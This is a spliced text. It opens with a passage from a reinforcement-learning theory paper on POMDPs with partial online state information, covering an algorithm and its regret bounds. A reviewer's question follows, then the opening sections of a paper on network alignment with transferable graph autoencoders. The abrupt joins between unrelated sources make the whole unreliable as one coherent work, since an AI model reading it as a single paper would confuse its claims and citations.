**Class 2. (POMDPs with partial OSI and partial noisy observations)** At each step, (step-i) the agent actively selects sub-states $\hat{i}^k_h$ to query, and receives the partial OSI $\{\phi_i(s^k_h)\}_{i \in \hat{i}^k_h}$; (step-ii) the agent receives the partial noisy observation $\tilde{o}^k_h$ for the other $d - \tilde{d}$ sub-states that are not queried, where $\tilde{o}^k_h$ is generated according to the partial emission probability $\tilde{\Theta}_h^{\hat{i}^k_h}\left(\cdot \,\middle|\, \{\phi_i(s^k_h)\}_{i \notin \hat{i}^k_h}\right)$. The partial emission matrix $\tilde{\Theta}_h^{\hat{i}} \in \mathbb{R}^{O \times |\mathbb{S}|^{d-\tilde{d}}}$ satisfies the partially revealing condition: there exists a constant $\alpha > 0$ such that $\sigma_{\bar{S}}(\tilde{\Theta}_h^{\hat{i}}) \geq \alpha$ for any queried sub-states $\hat{i}$ and any step $h$, where $\bar{S} = |\mathbb{S}|^{d-\tilde{d}}$ and $\sigma_{\bar{S}}(\cdot)$ denotes the $\bar{S}$-th largest singular value of a matrix. Namely, $\min_{\{h,\hat{i}\}} \sigma_{\bar{S}}(\tilde{\Theta}_h^{\hat{i}}) \geq \alpha$ holds; (step-iii) the agent takes an action $a^k_h$ and receives the reward $r_h(\phi_{\hat{i}^k_h}(s^k_h), a^k_h)$; (step-iv) the next state $s^k_{h+1}$ is drawn according to the joint transition probability $P_h(\cdot|s^k_h, a^k_h)$.

We note that in classic POMDPs (Chen et al., 2022a; Liu et al., 2022; 2023), the noisy observation is independent of the decisions of the agent. In contrast, in Class 2, at each step the partial noisy observation $\tilde{o}^k_h$ depends on the query $\hat{i}^k_h$ of the agent. This new dependency results in new non-trivial challenges in both the algorithm design and the regret analysis. For clarity, we use $\Gamma^k_h \triangleq \{\hat{i}^k_1, \phi_{\hat{i}^k_1}(s^k_1), \tilde{o}^k_1, a^k_1, ..., \hat{i}^k_{h-1}, \phi_{\hat{i}^k_{h-1}}(s^k_{h-1}), \tilde{o}^k_{h-1}, a^k_{h-1}\}$ to denote the feedback (including both the partial OSI $\Phi^k_h$ and the partial noisy observations $\tilde{o}^k_{1:h-1}$) in this case.

**Remark 3.** The partially revealing condition in step-ii of Class 2 is milder than the weakly revealing condition in Liu et al. (2022), which requires $\min_{h} \sigma_S(\Omega_h) \geq \alpha$, where $S = |\mathbb{S}|^d$ is the total number of states and $\Omega_h$ is the emission matrix introduced in Sec. 2.1. This is because for an $m \times n$ matrix $A$ and an $m \times (n-l)$ sub-matrix $B$ of $A$, we have $\sigma_{i+l}(A) \leq \sigma_i(B)$ (Horn et al., 1994).

**Remark 4.** Without the partially revealing condition in step-ii of Class 2, POMDPs with partial OSI are still intractable in the worst case.
This can be shown by letting the partial emission probability \( \tilde{\Theta}_h^i \) of each query set \( i \) be the same for all possible non-queried sub-states \( \{\phi_i(s)\}_{i \notin i} \); we can then show that learning an \( \epsilon \)-optimal policy in POMDPs with partial OSI still necessarily requires \( \Omega(A^H/\epsilon^2) \) samples.

For Class 2, we develop a new near-optimal algorithm (see Algorithm 2), called Optimistic Maximum Likelihood Estimation with Partial OSI (OMLE-POSI). Recall that the new challenges here are: (i) the partial noisy observation $\tilde{o}_h^k$ depends on the query $i_h^k$ of the agent; (ii) the performance of the action policy $\pi_{a,h}$ depends on both the observation $\tilde{o}_h^k$ and the query $i_h^k$. Our algorithm is inspired by the idea of OMLE, but extends it to elegantly address the non-trivial joint optimization of the query and action policies. Specifically, OMLE-POSI (in Algorithm 2) differs from OMLE in two aspects. First, in “Step-1”, OMLE-POSI only collects the partial noisy observations $\tilde{o}_{1:H}$, which rely on the queries $i_{1:H}$ determined in Step-2. Due to this new relation, in Eq. 5 we design a new bonus term $\beta = O\left( \left(|\bar{S}|^{2d} A + |\bar{S}|^{d-\tilde{d}} O\right) \ln\left(|\bar{S}|^{d} A O H K\right) \right)$, which depends on the size $|\bar{S}|^{d-\tilde{d}}$ of the non-queried sub-state space, and OMLE-POSI only estimates the partial emission model $\tilde{\Theta}$. Second, note that in the joint optimization of “Step-2”, the action policy $\pi_a$ is inherently a function of the query policy $\pi_q$, since the action $a_h^k$ taken according to $\pi_{a,h}$ relies on the observation $\tilde{o}_h^k$, which in turn depends on the query $i_h^k$ made according to $\pi_{q,h}$. Due to page limits, please see Appendix G for more details.

**Theorem 3. (Regret)** For POMDPs with partial OSI and the partially revealing condition, with probability $1 - \delta$, when $|\bar{S}| > (d/\tilde{d})^2$, the regret of OMLE-POSI can be upper-bounded as follows,

$$\text{Reg}_{\text{OMLE-POSI}}(K) \leq \tilde{O} \left( |\bar{S}|^{2d-\tilde{d}} O A H^4 \sqrt{K\left(|\bar{S}|^{2d} A + |\bar{S}|^{(d-\tilde{d})/2} O\right)/\alpha^2} \right). \tag{6}$$

Theorem 3 above shows that (i) the regret of OMLE-POSI depends on $\sqrt{K}$, which is tight; (ii) the regret depends polynomially on $A$ and $H$; and (iii) the regret decreases exponentially as $\tilde{d}$ increases. To the best of our knowledge, this is the first such near-optimal result for POMDPs with partial OSI. Recall that partial OSI affects both the MLE and the policy optimization. Thus, the main difficulty in the proof of Theorem 3 is how to capture these new effects. Indeed, directly applying the existing observable operator method (OOM) [Jaeger (2000); Liu et al. (2022)] would result in a regret that does not decrease with $\tilde{d}$. Please see Appendix G for our new analytical ideas and the proof.

**Theorem 4. (Lower bound)** For POMDPs with partial online state information and the partially revealing condition, the regret of any algorithm $\pi$ can be lower-bounded as follows,

$$\text{Reg}^\pi(K) \geq \tilde{\Omega} \left( \sqrt{AH} \cdot |\bar{S}|^{d/2} \cdot \sqrt{K} \right). \tag{7}$$

Theorem 4 indicates that the dependency on $|\bar{S}|^{d/2}$ in the regret of OMLE-POSI is necessary.
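Returning to Algorithm 2, the confidence set of Eq. 5 in “Step-1” admits a compact sketch over a finite candidate model class. The names below are illustrative, and `log_lik` is assumed to return \( \log \mathbb{P}_{\theta}(\Gamma) \) for a single feedback trajectory \( \Gamma \).

```python
import numpy as np

def omle_confidence_set(models, log_lik, trajectories, beta):
    """Sketch of Eq. 5: keep every candidate model theta = (P, Theta~, Delta_1)
    whose cumulative log-likelihood of the collected feedback trajectories is
    within beta of the best candidate's."""
    scores = np.array([sum(log_lik(theta, gamma) for gamma in trajectories)
                       for theta in models])
    return [theta for theta, s in zip(models, scores)
            if s >= scores.max() - beta]
```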
Our key proof idea in Appendix H is to construct a new special state transition, such that even with partial OSI, all combinations of sub-states $\phi_i(s)$ must be explored to achieve a sub-linear regret. We conjecture that a stronger lower bound depending on the query capability would be $\tilde{\Omega} \left( \sqrt{AH} \cdot |\bar{S}|^{(d-\tilde{d})/2} \cdot \sqrt{K}/\alpha \right)$, and leave this as an open question for future work.

### 6 DISCUSSION AND CONCLUSION

It is worthwhile to draw connections between our POMDP setting and both the standard POMDP setting and the general decision-making problem. First, our POMDP setting can be placed under the general decision-making setting [Foster et al. (2021); Chen et al. (2022b); Foster et al. (2023)]. However, directly instantiating their results for our Classes 1 and 2 would result in worse regret upper bounds than the ones we obtain here, which exploit our special problem structure, such as the dependency of the action policy $\pi_a$ on the query policy $\pi_q$, to develop more refined bounds. Second, our POMDP setting cannot be placed under the standard POMDP setting [Liu et al. (2022); Chen et al. (2022a)], mainly due to the special sequential structure of the query, observation, action, and reward in our process. A more detailed discussion is provided in Appendix B.

To conclude, this paper answers a fundamental open question: how much online state information (OSI) is sufficient to achieve tractability in POMDPs? Specifically, we establish a lower bound that reveals a surprising hardness result: unless we have full OSI, exponential complexity is needed to obtain an $\epsilon$-optimal policy for general POMDPs. Nonetheless, we identify two novel tractable classes of POMDPs with only partial OSI, which are important in practice. For these two classes, we provide three new RL algorithms, which are shown to be near-optimal by establishing new regret upper and lower bounds. Several directions for future work remain. For example, it would be interesting to study the value of partial OSI in more general POMDPs, e.g., with continuous state spaces [Cai et al. (2022); Liu et al. (2023)]. Second, the regret upper and lower bounds that we achieve could be further tightened, e.g., by improving the dependency on $d$ and $O$ using ideas from Chen et al. (2023).

REFERENCES

Alekh Agarwal, Nan Jiang, Sham M Kakade, and Wen Sun. Reinforcement learning: Theory and algorithms. CS Dept., UW Seattle, Seattle, WA, USA, Tech. Rep., pp. 10–4, 2019.

Ilge Akkaya, Marcin Andrychowicz, Maciek Chociej, Mateusz Litwin, Bob McGrew, Arthur Petron, Alex Paino, Matthias Plappert, Glenn Powell, Raphael Ribas, et al. Solving Rubik's cube with a robot hand. arXiv preprint arXiv:1910.07113, 2019.

Karl Johan Åström. Optimal control of Markov processes with incomplete state information. Journal of Mathematical Analysis and Applications, 10(1):174–205, 1965.

Alex Ayoub, Zeyu Jia, Csaba Szepesvari, Mengdi Wang, and Lin Yang. Model-based reinforcement learning with value-targeted regression. In International Conference on Machine Learning, pp. 463–474. PMLR, 2020.

Mohammad Gheshlaghi Azar, Ian Osband, and Rémi Munos. Minimax regret bounds for reinforcement learning. In International Conference on Machine Learning, pp. 263–272. PMLR, 2017.

Yu Bai, Tengyang Xie, Nan Jiang, and Yu-Xiang Wang. Provably efficient Q-learning with low switching cost. Advances in Neural Information Processing Systems, 32, 2019.
Christopher Berner, Greg Brockman, Brooke Chan, Vicki Cheung, Przemyslaw Debiak, Christy Dennison, David Farhi, Quirin Fischer, Shariq Hashme, Chris Hesse, et al. Dota 2 with large scale deep reinforcement learning. arXiv preprint arXiv:1912.06680, 2019.

Qi Cai, Zhuoran Yang, Chi Jin, and Zhaoran Wang. Provably efficient exploration in policy optimization. In International Conference on Machine Learning, pp. 1283–1294. PMLR, 2020.

Qi Cai, Zhuoran Yang, and Zhaoran Wang. Reinforcement learning from partial observation: Linear function approximation with provable sample efficiency. In International Conference on Machine Learning, pp. 2485–2522. PMLR, 2022.

Fan Chen, Yu Bai, and Song Mei. Partially observable RL with B-stability: Unified structural condition and sharp sample-efficient algorithms. In The Eleventh International Conference on Learning Representations, 2022a.

Fan Chen, Song Mei, and Yu Bai. Unified algorithms for RL with decision-estimation coefficients: No-regret, PAC, and reward-free learning. arXiv preprint arXiv:2209.11745, 2022b.

Fan Chen, Huan Wang, Caiming Xiong, Song Mei, and Yu Bai. Lower bounds for learning in revealing POMDPs. arXiv preprint arXiv:2302.01333, 2023.

Yunxia Chen, Qing Zhao, and Ananthram Swami. Joint design and separation principle for opportunistic spectrum access in the presence of sensing errors. IEEE Transactions on Information Theory, 54(5):2053–2071, 2008.

Yonathan Efroni, Chi Jin, Akshay Krishnamurthy, and Sobhan Miryoosefi. Provable reinforcement learning with a short-term memory. In International Conference on Machine Learning, pp. 5832–5850. PMLR, 2022.

Dylan J Foster, Sham M Kakade, Jian Qian, and Alexander Rakhlin. The statistical complexity of interactive decision making. arXiv preprint arXiv:2112.13487, 2021.

Dylan J Foster, Noah Golowich, and Yanjun Han. Tight guarantees for interactive decision making with the decision-estimation coefficient. arXiv preprint arXiv:2301.08215, 2023.

Noah Golowich, Ankur Moitra, and Dhruv Rohatgi. Planning in observable POMDPs in quasipolynomial time. arXiv preprint arXiv:2201.04735, 2022.

Milos Hauskrecht. Value-function approximations for partially observable Markov decision processes. Journal of Artificial Intelligence Research, 13:33–94, 2000.

Milos Hauskrecht and Hamish Fraser. Planning treatment of ischemic heart disease with partially observable Markov decision processes. Artificial Intelligence in Medicine, 18(3):221–244, 2000.
MCUvAc1GTg
While you state DeepWalk to be one of your baseline models, it is absent in Table 3 and only used for subgraph matching in Figure 3. Could you please explain why you choose not to use it for graph matching?
Network Alignment with Transferable Graph Autoencoders Anonymous authors Paper under double-blind review Abstract Network alignment is the task of establishing one-to-one correspondences between the nodes of different graphs and finds a plethora of applications in high-impact domains. However, this task is known to be NP-hard in its general form, and existing algorithms do not scale up as the size of the graphs increases. To tackle both challenges we propose a novel generalized graph autoencoder architecture, designed to extract powerful and robust node embeddings that are tailored to the alignment task. We prove that the generated embeddings are associated with the eigenvalues and eigenvectors of the graphs and can achieve more accurate alignment compared to classical spectral methods. Our proposed framework also leverages transfer learning and data augmentation to achieve efficient network alignment at a large scale without retraining. Extensive experiments on both network and sub-network alignment with real-world graphs provide corroborating evidence supporting the effectiveness and scalability of the proposed approach. 1 Introduction Network alignment, also known as graph matching, is a classical problem in graph theory that aims to find node correspondences across different graphs and is vital in a number of high-impact domains (Emmert-Streib et al., 2016). In social networks, for instance, network alignment has been used for user deanonymization (Nilizadeh et al., 2014) and analysis (Ogaard et al., 2013), while in bioinformatics it is a key tool to identify functionalities in protein complexes (Singh et al., 2008) or to identify gene–drug modules (Chen et al., 2018). Graph matching also finds applications in computer vision (Conte et al., 2003), sociology (Racz & Sridhar, 2021), and politics (Li et al., 2022), to name a few. Graph matching can be cast as a quadratic assignment problem (QAP), which is in general NP-hard (Koopmans & Beckmann, 1957). Various approaches have been developed to tackle network alignment and can be divided into two main categories: i) optimization algorithms that attempt to approximate the QAP by relaxing the combinatorial constraints, and ii) embedding methods that approach the problem by implicitly or explicitly generating powerful node embeddings that facilitate the alignment task. Optimization approaches such as (Anstreicher & Brixius, 2001; Vogelstein et al., 2015) employ quadratic programming relaxations, while (Klau, 2009) and (Peng et al., 2010) utilize semidefinite and Lagrangian-based relaxations, respectively. Successive convex approximations were also proposed by Konar & Sidiropoulos (2020) to handle the QAP. Challenges associated with these methods include high computational cost, infeasible solutions, or the need for near-optimal initialization. Embedding methods, on the other hand, overcome these challenges, but they usually produce inferior solutions, due to an inherent trade-off between embedding permutation-equivariance and the ability to capture the structural information of the graph. Typical embedding techniques include spectral and factorization methods (Umeyama, 1988; Feizi et al., 2019; Zhang & Tong, 2016; Kanatsoulis & Sidiropoulos, 2022), structural feature engineering methods (Berlingerio et al., 2013; Heimann et al., 2018), and random walk approaches (Perozzi et al., 2014; Grover & Leskovec, 2016a).
Recently, Chen et al. (2020) and Karakasis et al. (2021) proposed joint node embedding and network alignment to overcome these challenges, but these methods do not scale up as the size of the graph increases. Graph Neural Networks (GNNs) are powerful architectures that learn graph representations (embeddings). They have shown state-of-the-art performance in several tasks, including biology (Gainza et al., 2020; Strokach et al., 2020; Jiang et al., 2021), quantum chemistry (Gilmer et al., 2017), social networks and recommender systems (Ying et al., 2018; Wu et al., 2020). Recently, Gao et al. (2021a) proposed a GNN approach to match attributed graphs. The method used a joint embedding framework for pairs of graphs and achieved high levels of matching accuracy. However, this method does not scale to large graphs, since training graphs with large sizes is computationally prohibitive. To address these challenges, we propose a novel self-supervised GNN framework to perform network alignment on a large scale. Specifically, we design a generalized transferable graph autoencoder (T-GAE) (shown in Fig. 1) to produce permutation-equivariant and highly expressive embeddings, overcoming the challenges of other embedding techniques. T-GAE is trained on multiple graphs and learns node representations that are tailored to perform alignment between nodes of different graphs. The T-GAE representations combine the eigenvectors of the graph in a nonlinear fashion and are provably at least as good in network alignment as certain spectral methods. Additionally, the proposed framework leverages transfer learning and data augmentation to efficiently operate with large graphs. Training is performed with small graphs, in a self-supervised manner, and the trained encoder can be executed on large graphs to tackle network alignment at a large scale. Extensive experiments with real-world benchmarks test the effectiveness and limits of the proposed T-GAE approach in the tasks of graph and sub-graph matching. The experimental results provide corroborating evidence that T-GAE offers an elegant framework for large-scale network alignment. Our contributions are summarized as follows: (C1) We propose T-GAE, a generalized graph autoencoder architecture that can be trained with multiple graphs and produce expressive, permutation-equivariant representations tailored to network alignment. (C2) We draw the connection between T-GAE and spectral methods and prove that T-GAE is at least as good in graph matching as the absolute value of the graph eigenvectors. (C3) We leverage data augmentation and transfer learning to develop a robust framework that efficiently performs network alignment at a large scale. (C4) We demonstrate the effectiveness and scalability of the proposed T-GAE with real-world, benchmark graphs in challenging graph and sub-graph matching settings. 2 PRELIMINARIES Graphs are represented by \( G := (\mathcal{V}, \mathcal{E}) \), where \( \mathcal{V} = \{1, \ldots, N\} \) is the set of vertices (nodes) and \( \mathcal{E} = \{(v, u)\} \) is the set of edges between pairs of vertices. A graph is represented in matrix form by a graph operator $S \in \mathbb{R}^{N \times N}$, where $S(i, j)$ quantifies the relation between node $i$ and node $j$ and $N = |\mathcal{V}|$ is the total number of vertices. In this work, we use the graph adjacency and the normalized graph adjacency.
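For concreteness, a minimal construction of these two graph operators might look as follows. The symmetric normalization \( D^{-1/2} S D^{-1/2} \) is an assumption of this sketch; the paper does not pin down which normalization it uses, and all names are illustrative.

```python
import numpy as np

def graph_operators(edges, num_nodes):
    """Build the adjacency S and a normalized adjacency for an undirected graph."""
    S = np.zeros((num_nodes, num_nodes))
    for u, v in edges:
        S[u, v] = S[v, u] = 1.0            # undirected edge
    deg = S.sum(axis=1)
    d_inv_sqrt = np.zeros(num_nodes)
    nz = deg > 0                           # guard against isolated nodes
    d_inv_sqrt[nz] = deg[nz] ** -0.5
    S_norm = d_inv_sqrt[:, None] * S * d_inv_sqrt[None, :]  # D^{-1/2} S D^{-1/2}
    return S, S_norm

S, S_norm = graph_operators([(0, 1), (1, 2), (2, 0), (2, 3)], num_nodes=4)
```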
Oftentimes, the nodes of the graph are associated with graph signals or node attributes $X \in \mathbb{R}^{N \times D}$ that encode additional information about the nodes. In this paper, we study network alignment of graphs both with and without attributes. ### 2.1 Network Alignment **Definition 1 (Network Alignment).** Given a pair of graphs $\mathcal{G} := (\mathcal{V}, \mathcal{E})$, $\hat{\mathcal{G}} := (\hat{\mathcal{V}}, \hat{\mathcal{E}})$, with graph adjacencies $S$, $\hat{S}$, network alignment aims to find a bijection $g : \mathcal{V} \rightarrow \hat{\mathcal{V}}$ which minimizes the number of edge disagreements between the two graphs. Formally, the problem can be written as: $$\min_{P \in \mathcal{P}} \| S - P \hat{S} P^T \|_F^2, \tag{1}$$ where $\mathcal{P}$ is the set of permutation matrices. As mentioned in the introduction, network alignment is equivalent to the QAP, which has been proven to be NP-hard (Koopmans & Beckmann, 1957). ### 2.2 Spectral Decomposition of the Graph A popular approach to tackle network alignment is to learn powerful node embeddings that capture the connectivity information of the graph. Network alignment can then be achieved by matching the node embeddings of different graphs rather than the graph adjacencies, as follows: $$\min_{P \in \mathcal{P}} \| E - P \hat{E} \|_F^2, \tag{2}$$ where $E \in \mathbb{R}^{N \times F}$ is the embedding matrix and $E[i, :]$ is the vector representation of node $i$. The optimization problem in (2) is a linear assignment problem and can be optimally solved in $O(N^3)$ by the Hungarian method (Kuhn, 1955b). Simpler sub-optimal alternatives also exist that operate with $O(N^2)$ or $O(N \log(N))$ flops. A question that naturally arises is how to generate powerful node embeddings that capture the network connectivity and are also effective in aligning different graphs. A natural and effective approach is to leverage the spectral decomposition of the graph, $S = V \Lambda V^T$, where $V$ is the orthonormal matrix of the eigenvectors and $\Lambda$ is the diagonal matrix of corresponding eigenvalues. Note that we assume undirected graphs and thus $S$ is symmetric. Spectral decomposition has been proven to be an efficient approach to generating meaningful node embeddings for graph matching (Umeyama, 1988; Feizi et al., 2019). In particular, $E = V$ or $E = V \Lambda$ are node embeddings that capture the network connectivity since they can perfectly reconstruct the graph. However, $V$ is not unique. Thus, computing the spectral decomposition of the same graph with node relabelling, $\hat{S} = P S P^T$, is not guaranteed to produce a permuted version of $V$, i.e., $P V$. Even in the case where $S$ does not have repeated eigenvalues, $V$ is only unique up to column sign, which prevents effective matching. To overcome the aforementioned uniqueness limitation, one can focus on the top $m$ eigenvectors that correspond to non-repeated eigenvalues in both $S$ and $\hat{S}$ and compute their absolute values. Then network alignment can be cast as: $$\min_{P \in \mathcal{P}} \| |V_m| - P |\hat{V}_m| \|_F^2, \tag{3}$$ where $V_m, \hat{V}_m \in \mathbb{R}^{N \times m}$ contain the eigenvectors of $S$ and $\hat{S}$ associated with the non-repeated eigenvalues. The formulation in (3) is similar to the problem solved in (Umeyama, 1988).
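The following is a minimal sketch of this spectral matching pipeline, combining Eqs. (2) and (3). For simplicity it takes the $m$ leading eigenvectors of each graph; the restriction to eigenvectors of non-repeated eigenvalues is not checked here, which is an assumption of this sketch.

```python
import numpy as np
from scipy.optimize import linear_sum_assignment

def spectral_match(S, S_hat, m):
    """Align two graphs by matching absolute eigenvector embeddings, Eq. (3)."""
    # eigh returns eigenvalues in ascending order for symmetric matrices
    _, V = np.linalg.eigh(S)
    _, V_hat = np.linalg.eigh(S_hat)
    E, E_hat = np.abs(V[:, -m:]), np.abs(V_hat[:, -m:])
    # pairwise squared distances between node embeddings
    cost = ((E[:, None, :] - E_hat[None, :, :]) ** 2).sum(-1)
    rows, cols = linear_sum_assignment(cost)   # Hungarian method, O(N^3)
    return cols                                # cols[i]: node of S_hat matched to node i of S
```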
### 3 Graph Neural Networks (GNNs) Upper-Bound Spectral Methods for Network Alignment

A GNN is a cascade of layers and performs local, message-passing operations that are usually defined by the following recursive equation:

$$x_v^{(l+1)} = g\left(x_v^{(l)}, f\left(\{x_u^{(l)} : u \in \mathcal{N}(v)\}\right)\right), \tag{4}$$

where \( \mathcal{N}(v) \) is the neighborhood of vertex \( v \), i.e., \( u \in \mathcal{N}(v) \) iff \((u, v) \in \mathcal{E}\). The function \( f \) operates on multisets (\(\{\cdot\}\) represents a multiset) and \( f, g \) are ideally injective. Common choices for \( f \) are the summation or the mean function, and for \( g \) the linear function or the multi-layer perceptron (MLP). Overall, the output of the \( L \)-th layer of a GNN is a function \( \phi(X; S, \mathcal{H}) : \mathbb{R}^{N \times D} \rightarrow \mathbb{R}^{N \times D_L} \), where \( S \) is the graph operator and \( \mathcal{H} \) is the tensor of the trainable parameters of all \( L \) layers, and it produces \( D_L \)-dimensional embeddings for the nodes of the graph defined by \( S \). GNNs admit some very valuable properties. First, they are permutation equivariant:

**Theorem 3.1** ([Xu et al., 2019b; Maron et al., 2018]). Let \( \phi(X; S, \mathcal{H}) : \mathbb{R}^{N \times D} \rightarrow \mathbb{R}^{N \times D_L} \) be a GNN with parameters \( \mathcal{H} \). For \( \tilde{X} = PX \) and \( \tilde{S} = PSP^T \), which correspond to a node relabelling according to the permutation matrix \( P \), the output of the GNN takes the form: \[ \tilde{X}^{(L)} = \phi(\tilde{X}; \tilde{S}, \mathcal{H}) = P \phi(X; S, \mathcal{H}). \]

The above property is not satisfied by other spectral methods. GNNs are also stable ([Gama et al., 2020]), transferable ([Ruiz et al., 2020]), and have high expressive power ([Xu et al., 2019b; Abboud et al., 2021; Kanatsoulis & Ribeiro, 2022]).

### 3.1 GNNs and Network Alignment

To characterize the ability of a GNN to perform network alignment, we first point out that GNNs perform nonlinear spectral operations. Details can be found in Appendix B. We can prove that:

**Theorem 3.2.** Let \( \mathcal{G}, \hat{\mathcal{G}} \) be graphs with adjacencies \( S, \hat{S} \) that have non-repeated eigenvalues. Also let \( P^\circ, P^\dagger \) be solutions to the optimization problems in (1) and (3), respectively. Then there exists a GNN \( \phi(X; S, \mathcal{H}) : \mathbb{R}^{N \times D} \rightarrow \mathbb{R}^{N \times D_L} \) such that: \[ \| S - P^\circ \hat{S} P^{\circ T} \|_F^2 \leq \| S - P^* \hat{S} P^{* T} \|_F^2 \leq \| S - P^\dagger \hat{S} P^{\dagger T} \|_F^2, \] with \[ P^* = \arg \min_{P \in \mathcal{P}} \| \phi(X; S, \mathcal{H}) - P \phi(\hat{X}; \hat{S}, \mathcal{H}) \|_F^2. \]

The proof can be found in Appendix C. The assumption that the graph adjacencies have non-repeated eigenvalues is not restrictive; real nonisomorphic graphs have different eigenvalues with very high probability ([Haemers & Spence, 2004]). Theorem 3.2 compares the network alignment power of a GNN with that of a spectral algorithm ([Umeyama, 1988]) that uses the absolute values of the graph adjacency eigenvectors to match two different graphs. According to Theorem 3.2, there always exists a GNN that can perform at least as well as the spectral approach. The proof studies a GNN with white random input and measures the variance of the filter output. It then shows that GNN layers are able to compute the absolute values of the graph adjacency eigenvectors when the adjacency has non-repeated eigenvalues. As a result, there always exists a single-layer GNN that outputs the same node features as the ones used in [Umeyama, 1988], which concludes our proof.
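As an illustration of Eq. (4) and of the permutation equivariance in Theorem 3.1, here is a small numpy sketch of one layer with \( f = \) sum and \( g = \) an MLP on the concatenated own state and aggregated messages (a GIN-flavored choice; this is not claimed to be the exact layer used in the paper), followed by a numerical equivariance check.

```python
import numpy as np

def gnn_layer(X, S, W1, b1, W2, b2):
    """One message-passing layer of the form of Eq. (4)."""
    msgs = S @ X                              # f: sum of neighbor features
    H = np.concatenate([X, msgs], axis=1)     # g's input: (x_v, f({x_u}))
    H = np.maximum(H @ W1 + b1, 0.0)          # MLP with ReLU
    return H @ W2 + b2

# numerical check of Theorem 3.1: phi(PX; PSP^T) == P phi(X; S)
rng = np.random.default_rng(0)
N, D, c = 5, 3, 4
X = rng.normal(size=(N, D))
S = np.triu(rng.integers(0, 2, (N, N)), 1)
S = S + S.T                                   # symmetric adjacency
W1, b1 = rng.normal(size=(2 * D, c)), np.zeros(c)
W2, b2 = rng.normal(size=(c, c)), np.zeros(c)
P = np.eye(N)[rng.permutation(N)]
out_relabeled = gnn_layer(P @ X, P @ S @ P.T, W1, b1, W2, b2)
out_permuted = P @ gnn_layer(X, S, W1, b1, W2, b2)
assert np.allclose(out_relabeled, out_permuted)
```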
### 4 Proposed Method

We now leverage the favorable properties of GNNs (permutation equivariance, expressivity, and transferability) and design a GNN approach to tackle network alignment at a large scale. Our approach learns low-dimensional node embeddings (Eq. 4) that enable graph matching by solving the linear assignment problem in (2) rather than the quadratic assignment problem in (1). In this section, we design a robust GNN framework such that the node embeddings are expressive enough to accurately match similar nodes and also stable to graph perturbations, so that they yield high-quality network alignment.

#### 4.1 Learning Geometry-Preserving Embeddings

A fundamental property of node embeddings is to preserve the geometry and topological characteristics of the network. This allows expressive node representations that can effectively approximate the original problem in (1) with the problem in (2). To achieve this goal we leverage an autoencoder architecture that reconstructs the original graph from the node embeddings. Results on GNN expressivity indicate that this reconstruction is doable under specific conditions (Abboud et al., 2021). To build topology-preserving embeddings we solve the following optimization problem:

$$\min_{\mathcal{H}} \ l \left( \rho \left( \phi (X; S, \mathcal{H}) \, \phi (X; S, \mathcal{H})^T \right), S \right),$$

where $l(\cdot)$ is the binary cross-entropy (BCE) and $\rho(\cdot)$ is the logistic function.

4.2 LARGE-SCALE NODE REPRESENTATION LEARNING WITH GENERALIZED GRAPH AUTO-ENCODERS

The goal of the proposed framework is to learn a function that maps graphs to node representations and effectively matches nodes from different graphs. This function is modeled by a GNN encoder $\phi (X; S, \mathcal{H})$, where each layer is described by Eq. 4. The learned encoder should work for a family of training graphs $\{G_0, \ldots, G_i, \ldots, G_I\}$ with a set of adjacency matrices $\mathcal{S} = \{S_0, \ldots, S_i, \ldots, S_I\}$, rather than a single graph. So the idea is not to train an autoencoder on a single graph, but to train a generalized graph autoencoder by solving the following optimization problem:

$$\min_{\mathcal{H}} \ E \left[ l \left( \rho \left( \phi (X; S_i, \mathcal{H}) \, \phi (X; S_i, \mathcal{H})^T \right), S_i \right) \right], \tag{9}$$

where $S_i \in \mathcal{S}$ is a realization from a family of graphs and the expectation (the empirical expectation in practice) is computed over this graph family. The generalized framework in (9) learns a mapping from graphs to node representations and can be applied to out-of-distribution graphs that have not been observed during training. This twist in the architecture enables node embedding and graph matching for large-scale graphs, where training is computationally prohibitive.

4.3 ROBUST AND GENERALIZABLE NODE REPRESENTATIONS WITH SELF-SUPERVISED LEARNING (DATA AUGMENTATION)

So far we have proposed a convolutional framework to produce expressive node representations that are tailored to perform network alignment. In this subsection, we further upgrade our framework by ensuring the robustness and generalization ability of the proposed GNN mapping. In particular, for each graph $S_i \in \mathcal{S}$, we augment the training set with a set of perturbed versions of $S_i$, described by the graph adjacencies $\mathcal{M}_i = \{\tilde{S}_i^{(0)}, \ldots, \tilde{S}_i^{(j)}, \ldots, \tilde{S}_i^{(J)}\}$. To do so, we add or remove edges with a certain probability, yielding $\tilde{S}_i \in \mathcal{M}_i$ such that $\tilde{S}_i = S_i + M$, where $M \in \{-1, 0, 1\}^{N \times N}$.
Note that $M$ changes for each $\tilde{S}_i$, and $M[m,n]$ can be equal to 1 or −1 only if $S_i[m,n]$ is equal to 0 or 1, respectively. To train the proposed generalized graph autoencoder we consider the following optimization problem:

$$\min_{\mathcal{H}} \ E_{\mathcal{S}} \left[ E_{\mathcal{M}_i} \left[ l \left( \rho \left( \phi (X; \tilde{S}_i, \mathcal{H}) \, \phi (X; \tilde{S}_i, \mathcal{H})^T \right), S_i \right) \right] \right], \tag{10}$$

where $E_{\mathcal{S}}$ is the expectation with respect to the family of graphs $\mathcal{S}$ and $E_{\mathcal{M}_i}$ is the expectation with respect to the perturbed graphs in $\mathcal{M}_i$. In practice, $E_{\mathcal{S}}$ and $E_{\mathcal{M}_i}$ correspond to empirical expectations. Note that training according to (10) also benefits the robustness of the model, which is crucial in deep learning tasks (Wang et al., 2022). A schematic illustration of the training process can be found in Fig. 1.

Remark 4.1. (Large-scale network alignment by transference) The proposed framework learns a mapping $\phi : \mathcal{G} \rightarrow \mathbb{R}^{N \times F}$ that produces expressive and robust node representations for a family of graphs $G \in \mathcal{G}$. This mapping is designed in such a way that the problem in (2) approximates the problem in (1) and allows solving network alignment in polynomial time. One of the main benefits of the proposed framework is that it enables large-scale network alignment. The transferability analysis of GNN encoders (Ruiz et al., 2020) suggests that we can train with small graphs and efficiently execute with much larger graphs when the substructures (motifs) that appear in the tested graphs were also partially observed during training. Since the proposed generalized graph autoencoder is trained with multiple graphs, a variety of motifs are observed during training, which cannot be observed with a classical graph autoencoder, and the proposed GNN encoder can be transferred to large-scale graphs.

| Task | Dataset | \(|\mathcal{V}|\) | \(|\mathcal{E}|\) | # Aligned Edges | Network Type |
|--------------------|--------------------------|-------------------|------------------|-----------------|-----------------------|
| Graph Matching | C. elegans [Kunegis et al., 2013] | 453 | 2,025 | 2,025 | Interactome |
| | Arenas [Leskovec & Kleinberg, 2014] | 1,135 | 3,982 | 3,982 | Email Communication |
| | Douban [Zhang & Tong, 2016] | 3,906 | 7,215 | 7,215 | Social Network |
